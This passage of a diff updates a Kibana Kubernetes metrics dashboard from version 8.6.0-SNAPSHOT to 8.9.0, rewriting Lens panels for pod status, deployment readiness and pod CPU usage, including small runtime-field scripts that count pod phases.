"b7b25285-ced1-481d-999e-1886b3463594": { - "columnOrder": [ - "3d69345e-fb52-485a-8762-fdfaf09ea013", - "1699b42c-8ab5-43dc-a722-6d70911eae94", - "1c9e34cf-591d-4a4f-9999-67e95918e933", - "92280dfe-0252-4993-9c5d-28764c18bc13", - "1df45e80-f287-4f85-9f8e-6efaddff0f77", - "866856c3-c189-4457-9240-ab6a9d2df75d" - ], - "columns": { - "1699b42c-8ab5-43dc-a722-6d70911eae94": { - "dataType": "string", - "isBucketed": true, - "label": "Filters", - "operationType": "filters", - "params": { - "filters": [ - { - "input": { - "language": "kuery", - "query": "*" - }, - "label": "Status" - } - ] - }, - "scale": "ordinal" - }, - "1c9e34cf-591d-4a4f-9999-67e95918e933": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "running: *" - }, - "isBucketed": false, - "label": "Running", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "running" - }, - "1df45e80-f287-4f85-9f8e-6efaddff0f77": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "pending: *" - }, - "isBucketed": false, - "label": "Pending", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "pending" - }, - "3d69345e-fb52-485a-8762-fdfaf09ea013": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "1df45e80-f287-4f85-9f8e-6efaddff0f77", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - }, - "866856c3-c189-4457-9240-ab6a9d2df75d": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "failed: *" - }, - "isBucketed": false, - "label": "Failed", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "failed" - }, - "92280dfe-0252-4993-9c5d-28764c18bc13": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "succeeded: *" - }, - "isBucketed": false, - "label": "Succeeded", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "succeeded" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "kubernetes.namespace" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "5c81359c-376d-41bd-984d-60fb106f2e33", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_pod" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_pod" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "0f308b41-fbc2-41aa-beef-ba6412224944" + ], + "layerId": "2ca9773d-0221-478b-b8bc-90bb8d439f33", + "layerType": "data", + "palette": { + "name": "status", + "type": "palette" + }, + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "splitAccessor": "76e50af3-9df6-42c7-9b0e-eea21ab3650f", + "xAccessor": "1a2ebd5d-82b1-4cf8-a934-152a5726a82f" + } + ], + "legend": { + "isVisible": false, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "show", + "xTitle": "", + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Running pods per namespace" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "91e43cd8-5259-43a8-b9d7-a098875ae5b3", + "w": 9, + "x": 9, + "y": 13 + }, + "panelIndex": "91e43cd8-5259-43a8-b9d7-a098875ae5b3", + "embeddableConfig": { + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "0fa53a1e-0589-4380-b700-70dd489a33de": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "0fa53a1e-0589-4380-b700-70dd489a33de", + "name": "state-pods-adhoc", + "runtimeFieldMap": { + "failed": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "not_running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "pending": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" + }, + "type": "long" + }, + "running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" + }, + "type": "long" + }, + "succeeded": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + } + }, + "datasourceStates": { + "formBased": { + "layers": { + "b7b25285-ced1-481d-999e-1886b3463594": { + "columnOrder": [ + "3d69345e-fb52-485a-8762-fdfaf09ea013", + "1699b42c-8ab5-43dc-a722-6d70911eae94", + "1c9e34cf-591d-4a4f-9999-67e95918e933", + "92280dfe-0252-4993-9c5d-28764c18bc13", + "1df45e80-f287-4f85-9f8e-6efaddff0f77", + "866856c3-c189-4457-9240-ab6a9d2df75d" + ], + "columns": { + "1699b42c-8ab5-43dc-a722-6d70911eae94": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + "operationType": "filters", + "params": { "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "0fa53a1e-0589-4380-b700-70dd489a33de", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_pod" - } - } - } - ], - "internalReferences": [ - { - "id": "0fa53a1e-0589-4380-b700-70dd489a33de", - "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", - "type": "index-pattern" - } - ], - "query": { - "language": "kuery", - "query": "" + { + "input": { + "language": "kuery", + "query": "*" + }, + "label": "Status" + } + ] + }, + "scale": "ordinal" + }, + "1c9e34cf-591d-4a4f-9999-67e95918e933": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "running: *" + }, + "isBucketed": false, + "label": "Running", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "running" + }, + "1df45e80-f287-4f85-9f8e-6efaddff0f77": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "pending: *" + }, + "isBucketed": false, + "label": "Pending", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "pending" + }, + "3d69345e-fb52-485a-8762-fdfaf09ea013": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "1df45e80-f287-4f85-9f8e-6efaddff0f77", + "type": "column" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "1c9e34cf-591d-4a4f-9999-67e95918e933", - "92280dfe-0252-4993-9c5d-28764c18bc13", - "1df45e80-f287-4f85-9f8e-6efaddff0f77", - "866856c3-c189-4457-9240-ab6a9d2df75d" - ], - "collapseFn": "sum", - "layerId": "b7b25285-ced1-481d-999e-1886b3463594", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "splitAccessor": "3d69345e-fb52-485a-8762-fdfaf09ea013", - "xAccessor": "1699b42c-8ab5-43dc-a722-6d70911eae94", - "yConfig": [ - { - "color": "#bd271e", - "forAccessor": "866856c3-c189-4457-9240-ab6a9d2df75d" - }, - { - "color": "#fec514", - "forAccessor": "1df45e80-f287-4f85-9f8e-6efaddff0f77" - }, - { - "color": "#00bfb3", - "forAccessor": "1c9e34cf-591d-4a4f-9999-67e95918e933" - }, - { - "color": "#0077cc", - "forAccessor": "92280dfe-0252-4993-9c5d-28764c18bc13" - } - ] - } - ], - "legend": { - "horizontalAlignment": "right", - "isInside": false, - "isVisible": false, - "maxLines": 1, - "position": "bottom", - "shouldTruncate": true, - "showSingleSeries": false, - "verticalAlignment": "bottom" - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "show", - "valuesInLegend": true, - "xTitle": "", - "yTitle": "" - } + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" }, - "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": { - "dynamicActions": { - "events": [] + "866856c3-c189-4457-9240-ab6a9d2df75d": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "failed: *" + }, + "isBucketed": false, + "label": "Failed", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "failed" + }, + "92280dfe-0252-4993-9c5d-28764c18bc13": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "succeeded: *" + }, + "isBucketed": false, + "label": "Succeeded", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "succeeded" } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "0fa53a1e-0589-4380-b700-70dd489a33de", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_pod" }, - "hidePanelTitles": false - }, - "gridData": { - "h": 6, - "i": "91e43cd8-5259-43a8-b9d7-a098875ae5b3", - "w": 9, - "x": 9, - "y": 13 - }, - "panelIndex": "91e43cd8-5259-43a8-b9d7-a098875ae5b3", - "title": "Pods", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_pod" + } + } + } + ], + "internalReferences": [ + { + "id": "0fa53a1e-0589-4380-b700-70dd489a33de", + "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", + "type": "index-pattern" + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "1c9e34cf-591d-4a4f-9999-67e95918e933", + "92280dfe-0252-4993-9c5d-28764c18bc13", + "1df45e80-f287-4f85-9f8e-6efaddff0f77", + "866856c3-c189-4457-9240-ab6a9d2df75d" + ], + "collapseFn": "sum", + "layerId": "b7b25285-ced1-481d-999e-1886b3463594", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "splitAccessor": "3d69345e-fb52-485a-8762-fdfaf09ea013", + "xAccessor": "1699b42c-8ab5-43dc-a722-6d70911eae94", + "yConfig": [ + { + "color": "#bd271e", + "forAccessor": "866856c3-c189-4457-9240-ab6a9d2df75d" + }, + { + "color": "#fec514", + "forAccessor": "1df45e80-f287-4f85-9f8e-6efaddff0f77" + }, + { + "color": "#00bfb3", + "forAccessor": "1c9e34cf-591d-4a4f-9999-67e95918e933" + }, + { + "color": "#0077cc", + "forAccessor": "92280dfe-0252-4993-9c5d-28764c18bc13" + } + ] + } + ], + "legend": { + "horizontalAlignment": "right", + "isInside": false, + "isVisible": false, + "maxLines": 1, + "position": "bottom", + "shouldTruncate": true, + "showSingleSeries": false, + "verticalAlignment": "bottom" + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "show", + "valuesInLegend": true, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [], - "state": { - "adHocDataViews": { - "0b9c02fc-3c21-47e2-abed-31cbc41b11cc": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "0b9c02fc-3c21-47e2-abed-31cbc41b11cc", - "name": "state_deployment-ad-hoc", - "runtimeFieldMap": { - "not_ready": { - "script": { - "source": "if (doc[\"kubernetes.deployment.replicas.desired\"].value - doc[\"kubernetes.deployment.replicas.available\"].value != 0) { emit(1) }" - }, - "type": "long" - }, - "ready": { - "script": { - "source": "if (doc[\"kubernetes.deployment.replicas.desired\"].value - doc[\"kubernetes.deployment.replicas.available\"].value == 0) { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "0fa53a1e-0589-4380-b700-70dd489a33de": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "0fa53a1e-0589-4380-b700-70dd489a33de", - "name": "state-pods-adhoc", - "runtimeFieldMap": { - "failed": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "not_running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "pending": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" - }, - "type": "long" - }, - "running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" - }, - "type": "long" - }, - "succeeded": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "34c15200-5232-4a16-8fb0-36ca5a194638": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "34c15200-5232-4a16-8fb0-36ca5a194638", - "name": "deployments-ad-hoc", - "runtimeFieldMap": { - "not_running": { - "script": { - "source": "if (doc['kubernetes.deployment.paused'].value == true) { emit(1) }" - }, - "type": "long" - }, - "running": { - "script": { - "source": "if (doc['kubernetes.deployment.paused'].value == false) { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "f8fa576a-6f91-4a11-a43d-7f3964869d7d": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "f8fa576a-6f91-4a11-a43d-7f3964869d7d", - "name": "daemonsets-ad-hoc", - "runtimeFieldMap": {}, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - } - }, - "datasourceStates": { - "formBased": { - "layers": { - "b7b25285-ced1-481d-999e-1886b3463594": { - "columnOrder": [ - "6690f3c6-3a05-47e0-8f98-5baea37f351c", - "2b790ab1-6a55-4c4c-9131-964752309c72", - "143fa2b5-a63f-4d51-9207-f6e3441dd124", - "16807879-5684-4aab-9b80-cc701f820e68" - ], - "columns": { - "143fa2b5-a63f-4d51-9207-f6e3441dd124": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "ready: *" - }, - "isBucketed": false, - "label": "Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "ready" - }, - "16807879-5684-4aab-9b80-cc701f820e68": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "not_ready: *" - }, - "isBucketed": false, - "label": "Not Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "not_ready" - }, - "2b790ab1-6a55-4c4c-9131-964752309c72": { - "dataType": "string", - "isBucketed": true, - "label": "Filters", - "operationType": "filters", - "params": { - "filters": [ - { - "input": { - "language": "kuery", - "query": "" - }, - "label": "Status" - } - ] - }, - "scale": "ordinal" - }, - "6690f3c6-3a05-47e0-8f98-5baea37f351c": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.deployment.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "143fa2b5-a63f-4d51-9207-f6e3441dd124", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.deployment.name" - } - }, - "incompleteColumns": {} - } - } - } - }, + "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": { + "dynamicActions": { + "events": [] + } + }, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Pods" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "9543898d-c036-4680-b122-45fe721c0226", + "w": 10, + "x": 18, + "y": 13 + }, + "panelIndex": "9543898d-c036-4680-b122-45fe721c0226", + "embeddableConfig": { + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "0b9c02fc-3c21-47e2-abed-31cbc41b11cc": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "0b9c02fc-3c21-47e2-abed-31cbc41b11cc", + "name": "state_deployment-ad-hoc", + "runtimeFieldMap": { + "not_ready": { + "script": { + "source": "if (doc[\"kubernetes.deployment.replicas.desired\"].value - doc[\"kubernetes.deployment.replicas.available\"].value != 0) { emit(1) }" + }, + "type": "long" + }, + "ready": { + "script": { + "source": "if (doc[\"kubernetes.deployment.replicas.desired\"].value - doc[\"kubernetes.deployment.replicas.available\"].value == 0) { emit(1) }" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "0fa53a1e-0589-4380-b700-70dd489a33de": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "0fa53a1e-0589-4380-b700-70dd489a33de", + "name": "state-pods-adhoc", + "runtimeFieldMap": { + "failed": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "not_running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "pending": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" + }, + "type": "long" + }, + "running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" + }, + "type": "long" + }, + "succeeded": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "34c15200-5232-4a16-8fb0-36ca5a194638": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "34c15200-5232-4a16-8fb0-36ca5a194638", + "name": "deployments-ad-hoc", + "runtimeFieldMap": { + "not_running": { + "script": { + "source": "if (doc['kubernetes.deployment.paused'].value == true) { emit(1) }" + }, + "type": "long" + }, + "running": { + "script": { + "source": "if (doc['kubernetes.deployment.paused'].value == false) { emit(1) }" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "f8fa576a-6f91-4a11-a43d-7f3964869d7d": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "f8fa576a-6f91-4a11-a43d-7f3964869d7d", + "name": "daemonsets-ad-hoc", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + } + }, + "datasourceStates": { + "formBased": { + "layers": { + "b7b25285-ced1-481d-999e-1886b3463594": { + "columnOrder": [ + "6690f3c6-3a05-47e0-8f98-5baea37f351c", + "2b790ab1-6a55-4c4c-9131-964752309c72", + "143fa2b5-a63f-4d51-9207-f6e3441dd124", + "16807879-5684-4aab-9b80-cc701f820e68" + ], + "columns": { + "143fa2b5-a63f-4d51-9207-f6e3441dd124": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "ready: *" + }, + "isBucketed": false, + "label": "Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "ready" + }, + "16807879-5684-4aab-9b80-cc701f820e68": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "not_ready: *" + }, + "isBucketed": false, + "label": "Not Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "not_ready" + }, + "2b790ab1-6a55-4c4c-9131-964752309c72": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + "operationType": "filters", + "params": { "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "0b9c02fc-3c21-47e2-abed-31cbc41b11cc", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_deployment" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_deployment" - } - } - } - ], - "internalReferences": [ - { - "id": "0b9c02fc-3c21-47e2-abed-31cbc41b11cc", - "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", - "type": "index-pattern" - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "143fa2b5-a63f-4d51-9207-f6e3441dd124", - "16807879-5684-4aab-9b80-cc701f820e68" - ], - "collapseFn": "sum", - "layerId": "b7b25285-ced1-481d-999e-1886b3463594", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "splitAccessor": "6690f3c6-3a05-47e0-8f98-5baea37f351c", - "xAccessor": "2b790ab1-6a55-4c4c-9131-964752309c72", - "yConfig": [ - { - "color": "#bd271e", - "forAccessor": "16807879-5684-4aab-9b80-cc701f820e68" - }, - { - "color": "#00bfb3", - "forAccessor": "143fa2b5-a63f-4d51-9207-f6e3441dd124" - } - ] - } - ], - "legend": { - "isVisible": false, - "position": "right", - "showSingleSeries": false - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "show", - "xTitle": "", - "yTitle": "" - } + { + "input": { + "language": "kuery", + "query": "" + }, + "label": "Status" + } + ] + }, + "scale": "ordinal" }, - "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": { - "dynamicActions": { - "events": [] + "6690f3c6-3a05-47e0-8f98-5baea37f351c": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.deployment.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "143fa2b5-a63f-4d51-9207-f6e3441dd124", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.deployment.name" } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "0b9c02fc-3c21-47e2-abed-31cbc41b11cc", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_deployment" }, - "hidePanelTitles": false - }, - "gridData": { - "h": 6, - "i": "9543898d-c036-4680-b122-45fe721c0226", - "w": 10, - "x": 18, - "y": 13 - }, - "panelIndex": "9543898d-c036-4680-b122-45fe721c0226", - "title": "Deployments", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_deployment" + } + } + } + ], + "internalReferences": [ + { + "id": "0b9c02fc-3c21-47e2-abed-31cbc41b11cc", + "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", + "type": "index-pattern" + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "143fa2b5-a63f-4d51-9207-f6e3441dd124", + "16807879-5684-4aab-9b80-cc701f820e68" + ], + "collapseFn": "sum", + "layerId": "b7b25285-ced1-481d-999e-1886b3463594", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "splitAccessor": "6690f3c6-3a05-47e0-8f98-5baea37f351c", + "xAccessor": "2b790ab1-6a55-4c4c-9131-964752309c72", + "yConfig": [ + { + "color": "#bd271e", + "forAccessor": "16807879-5684-4aab-9b80-cc701f820e68" + }, + { + "color": "#00bfb3", + "forAccessor": "143fa2b5-a63f-4d51-9207-f6e3441dd124" + } + ] + } + ], + "legend": { + "isVisible": false, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "show", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-06a776d4-f25a-45c0-a54e-82d0cb913047", - "type": "index-pattern" + "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": { + "dynamicActions": { + "events": [] + } + }, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Deployments" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 11, + "i": "14ceb02d-63b6-448a-85fe-28a9e974e80c", + "w": 24, + "x": 0, + "y": 19 + }, + "panelIndex": "14ceb02d-63b6-448a-85fe-28a9e974e80c", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-06a776d4-f25a-45c0-a54e-82d0cb913047", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a06a30d5-05f1-46ea-9075-3e6051f5781a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9c0b0d2f-c443-4c41-b55c-c7ad0db60302", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "06a776d4-f25a-45c0-a54e-82d0cb913047": { + "columnOrder": [ + "f4242bda-ae9c-4d7c-8cda-43f56c38acb5", + "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" + ], + "columns": { + "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.cpu.usage.limit.pct: *" + }, + "isBucketed": false, + "label": "Average Pod CPU Usage ", + "operationType": "last_value", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } }, - { - "id": "metrics-*", - "name": "a06a30d5-05f1-46ea-9075-3e6051f5781a", - "type": "index-pattern" + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.cpu.usage.limit.pct" + }, + "f4242bda-ae9c-4d7c-8cda-43f56c38acb5": { + "dataType": "string", + "isBucketed": true, + "label": "Top 5 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "accuracyMode": true, + "missingBucket": false, + "orderBy": { + "columnId": "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c", + "type": "column" }, - { - "id": "metrics-*", - "name": "9c0b0d2f-c443-4c41-b55c-c7ad0db60302", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "06a776d4-f25a-45c0-a54e-82d0cb913047": { - "columnOrder": [ - 